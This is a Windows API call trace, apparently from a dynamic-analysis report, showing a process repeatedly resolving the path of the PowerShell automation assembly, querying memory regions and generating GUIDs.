	[0101.665] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.665] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.665] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.665] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.665] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.666] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0x125c60fa, Data2=0x7ed3, Data3=0x43fd, Data4=([0]=0xb0, [1]=0x80, [2]=0xa9, [3]=0x33, [4]=0xba, [5]=0x77, [6]=0x85, [7]=0x75))) returned 0x0
	[0101.791] VirtualQuery (in: lpAddress=0xeb390, lpBuffer=0xec250, dwLength=0x30 | out: lpBuffer=0xec250*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.791] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.792] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebe60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.792] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebe60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.792] VirtualQuery (in: lpAddress=0xeb390, lpBuffer=0xec250, dwLength=0x30 | out: lpBuffer=0xec250*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.792] VirtualQuery (in: lpAddress=0xeb420, lpBuffer=0xec2e0, dwLength=0x30 | out: lpBuffer=0xec2e0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.792] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebb50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.792] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.792] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.793] VirtualQuery (in: lpAddress=0xeb390, lpBuffer=0xec250, dwLength=0x30 | out: lpBuffer=0xec250*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.793] VirtualQuery (in: lpAddress=0xeb420, lpBuffer=0xec2e0, dwLength=0x30 | out: lpBuffer=0xec2e0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.793] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebb50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.793] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.793] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.793] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.793] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebe60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.794] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebe60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.794] VirtualQuery (in: lpAddress=0xeb390, lpBuffer=0xec250, dwLength=0x30 | out: lpBuffer=0xec250*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.794] VirtualQuery (in: lpAddress=0xeb420, lpBuffer=0xec2e0, dwLength=0x30 | out: lpBuffer=0xec2e0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.795] VirtualQuery (in: lpAddress=0xeb390, lpBuffer=0xec250, dwLength=0x30 | out: lpBuffer=0xec250*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.795] VirtualQuery (in: lpAddress=0xeb420, lpBuffer=0xec2e0, dwLength=0x30 | out: lpBuffer=0xec2e0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.795] VirtualQuery (in: lpAddress=0xeb390, lpBuffer=0xec250, dwLength=0x30 | out: lpBuffer=0xec250*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.796] VirtualQuery (in: lpAddress=0xeb420, lpBuffer=0xec2e0, dwLength=0x30 | out: lpBuffer=0xec2e0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.796] VirtualQuery (in: lpAddress=0xeb390, lpBuffer=0xec250, dwLength=0x30 | out: lpBuffer=0xec250*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.796] VirtualQuery (in: lpAddress=0xeb420, lpBuffer=0xec2e0, dwLength=0x30 | out: lpBuffer=0xec2e0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.797] VirtualQuery (in: lpAddress=0xebc90, lpBuffer=0xecb50, dwLength=0x30 | out: lpBuffer=0xecb50*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.797] VirtualQuery (in: lpAddress=0xebd20, lpBuffer=0xecbe0, dwLength=0x30 | out: lpBuffer=0xecbe0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.798] VirtualQuery (in: lpAddress=0xebc90, lpBuffer=0xecb50, dwLength=0x30 | out: lpBuffer=0xecb50*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.798] VirtualQuery (in: lpAddress=0xebd20, lpBuffer=0xecbe0, dwLength=0x30 | out: lpBuffer=0xecbe0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.798] VirtualQuery (in: lpAddress=0xebd20, lpBuffer=0xecbe0, dwLength=0x30 | out: lpBuffer=0xecbe0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.798] VirtualQuery (in: lpAddress=0xebc90, lpBuffer=0xecb50, dwLength=0x30 | out: lpBuffer=0xecb50*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.798] VirtualQuery (in: lpAddress=0xebd20, lpBuffer=0xecbe0, dwLength=0x30 | out: lpBuffer=0xecbe0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.799] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0xff7126e9, Data2=0x9935, Data3=0x4c5b, Data4=([0]=0xa1, [1]=0xca, [2]=0x8c, [3]=0x58, [4]=0x3c, [5]=0x77, [6]=0xa0, [7]=0xd0))) returned 0x0
	[0101.799] VirtualQuery (in: lpAddress=0xebca0, lpBuffer=0xecb60, dwLength=0x30 | out: lpBuffer=0xecb60*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.799] VirtualQuery (in: lpAddress=0xebca0, lpBuffer=0xecb60, dwLength=0x30 | out: lpBuffer=0xecb60*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.799] VirtualQuery (in: lpAddress=0xebd30, lpBuffer=0xecbf0, dwLength=0x30 | out: lpBuffer=0xecbf0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.800] VirtualQuery (in: lpAddress=0xebca0, lpBuffer=0xecb60, dwLength=0x30 | out: lpBuffer=0xecb60*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.800] VirtualQuery (in: lpAddress=0xebd30, lpBuffer=0xecbf0, dwLength=0x30 | out: lpBuffer=0xecbf0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.800] VirtualQuery (in: lpAddress=0xebca0, lpBuffer=0xecb60, dwLength=0x30 | out: lpBuffer=0xecb60*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.801] VirtualQuery (in: lpAddress=0xebd30, lpBuffer=0xecbf0, dwLength=0x30 | out: lpBuffer=0xecbf0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.801] VirtualQuery (in: lpAddress=0xebca0, lpBuffer=0xecb60, dwLength=0x30 | out: lpBuffer=0xecb60*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.801] VirtualQuery (in: lpAddress=0xebd30, lpBuffer=0xecbf0, dwLength=0x30 | out: lpBuffer=0xecbf0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.801] VirtualQuery (in: lpAddress=0xebca0, lpBuffer=0xecb60, dwLength=0x30 | out: lpBuffer=0xecb60*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.802] VirtualQuery (in: lpAddress=0xebd30, lpBuffer=0xecbf0, dwLength=0x30 | out: lpBuffer=0xecbf0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.802] VirtualQuery (in: lpAddress=0xebca0, lpBuffer=0xecb60, dwLength=0x30 | out: lpBuffer=0xecb60*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.802] VirtualQuery (in: lpAddress=0xebd30, lpBuffer=0xecbf0, dwLength=0x30 | out: lpBuffer=0xecbf0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.802] VirtualQuery (in: lpAddress=0xebc90, lpBuffer=0xecb50, dwLength=0x30 | out: lpBuffer=0xecb50*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.803] VirtualQuery (in: lpAddress=0xebd20, lpBuffer=0xecbe0, dwLength=0x30 | out: lpBuffer=0xecbe0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.803] VirtualQuery (in: lpAddress=0xebc90, lpBuffer=0xecb50, dwLength=0x30 | out: lpBuffer=0xecb50*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.803] VirtualQuery (in: lpAddress=0xebd20, lpBuffer=0xecbe0, dwLength=0x30 | out: lpBuffer=0xecbe0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.804] VirtualQuery (in: lpAddress=0xebd20, lpBuffer=0xecbe0, dwLength=0x30 | out: lpBuffer=0xecbe0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.804] VirtualQuery (in: lpAddress=0xebc90, lpBuffer=0xecb50, dwLength=0x30 | out: lpBuffer=0xecb50*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.804] VirtualQuery (in: lpAddress=0xebd20, lpBuffer=0xecbe0, dwLength=0x30 | out: lpBuffer=0xecbe0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.804] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0x8cf70e47, Data2=0x4559, Data3=0x4bc2, Data4=([0]=0x88, [1]=0xaa, [2]=0xf6, [3]=0xb0, [4]=0x9e, [5]=0xa2, [6]=0xa1, [7]=0x54))) returned 0x0
	[0101.805] VirtualQuery (in: lpAddress=0xebc90, lpBuffer=0xecb50, dwLength=0x30 | out: lpBuffer=0xecb50*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.805] VirtualQuery (in: lpAddress=0xebd20, lpBuffer=0xecbe0, dwLength=0x30 | out: lpBuffer=0xecbe0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.806] VirtualQuery (in: lpAddress=0xebc90, lpBuffer=0xecb50, dwLength=0x30 | out: lpBuffer=0xecb50*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.806] VirtualQuery (in: lpAddress=0xebd20, lpBuffer=0xecbe0, dwLength=0x30 | out: lpBuffer=0xecbe0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.806] VirtualQuery (in: lpAddress=0xebd20, lpBuffer=0xecbe0, dwLength=0x30 | out: lpBuffer=0xecbe0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.806] VirtualQuery (in: lpAddress=0xebc90, lpBuffer=0xecb50, dwLength=0x30 | out: lpBuffer=0xecb50*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.806] VirtualQuery (in: lpAddress=0xebd20, lpBuffer=0xecbe0, dwLength=0x30 | out: lpBuffer=0xecbe0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.807] VirtualQuery (in: lpAddress=0xebc90, lpBuffer=0xecb50, dwLength=0x30 | out: lpBuffer=0xecb50*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.807] VirtualQuery (in: lpAddress=0xebd20, lpBuffer=0xecbe0, dwLength=0x30 | out: lpBuffer=0xecbe0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.807] VirtualQuery (in: lpAddress=0xebc90, lpBuffer=0xecb50, dwLength=0x30 | out: lpBuffer=0xecb50*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.807] VirtualQuery (in: lpAddress=0xebd20, lpBuffer=0xecbe0, dwLength=0x30 | out: lpBuffer=0xecbe0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.807] VirtualQuery (in: lpAddress=0xeb960, lpBuffer=0xec820, dwLength=0x30 | out: lpBuffer=0xec820*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.808] VirtualQuery (in: lpAddress=0xebc90, lpBuffer=0xecb50, dwLength=0x30 | out: lpBuffer=0xecb50*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.808] VirtualQuery (in: lpAddress=0xebd20, lpBuffer=0xecbe0, dwLength=0x30 | out: lpBuffer=0xecbe0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.808] VirtualQuery (in: lpAddress=0xebc90, lpBuffer=0xecb50, dwLength=0x30 | out: lpBuffer=0xecb50*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.808] VirtualQuery (in: lpAddress=0xebd20, lpBuffer=0xecbe0, dwLength=0x30 | out: lpBuffer=0xecbe0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.808] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0x338c40c2, Data2=0x7bbf, Data3=0x475b, Data4=([0]=0x82, [1]=0x22, [2]=0x84, [3]=0x97, [4]=0x54, [5]=0xf3, [6]=0xb0, [7]=0x39))) returned 0x0
	[0101.809] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0x5d0039c7, Data2=0x7d36, Data3=0x4573, Data4=([0]=0xa6, [1]=0x10, [2]=0x80, [3]=0xcc, [4]=0x61, [5]=0xaa, [6]=0x51, [7]=0x5f))) returned 0x0
	[0101.809] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0x7a05e65c, Data2=0x5fef, Data3=0x4806, Data4=([0]=0x93, [1]=0x72, [2]=0x36, [3]=0x6, [4]=0xa5, [5]=0x8e, [6]=0x8b, [7]=0xa))) returned 0x0
	[0101.810] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0x7a3e540d, Data2=0x8d48, Data3=0x494a, Data4=([0]=0x84, [1]=0x8b, [2]=0x2c, [3]=0xa7, [4]=0x43, [5]=0x91, [6]=0x80, [7]=0x82))) returned 0x0
	[0101.810] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0xb5548534, Data2=0x5301, Data3=0x46e2, Data4=([0]=0xb0, [1]=0xdb, [2]=0x8e, [3]=0x62, [4]=0xd9, [5]=0x29, [6]=0x28, [7]=0xd6))) returned 0x0
	[0101.811] VirtualQuery (in: lpAddress=0xeba70, lpBuffer=0xec930, dwLength=0x30 | out: lpBuffer=0xec930*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.811] VirtualQuery (in: lpAddress=0xebb00, lpBuffer=0xec9c0, dwLength=0x30 | out: lpBuffer=0xec9c0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.811] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0x359ad432, Data2=0x7a40, Data3=0x4cc1, Data4=([0]=0xaf, [1]=0xcc, [2]=0xb4, [3]=0xb6, [4]=0xbe, [5]=0x1d, [6]=0xb7, [7]=0x4a))) returned 0x0
	[0101.811] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0x7362d938, Data2=0xb325, Data3=0x4405, Data4=([0]=0x92, [1]=0xf, [2]=0xd1, [3]=0xe, [4]=0xaf, [5]=0x73, [6]=0x22, [7]=0x50))) returned 0x0
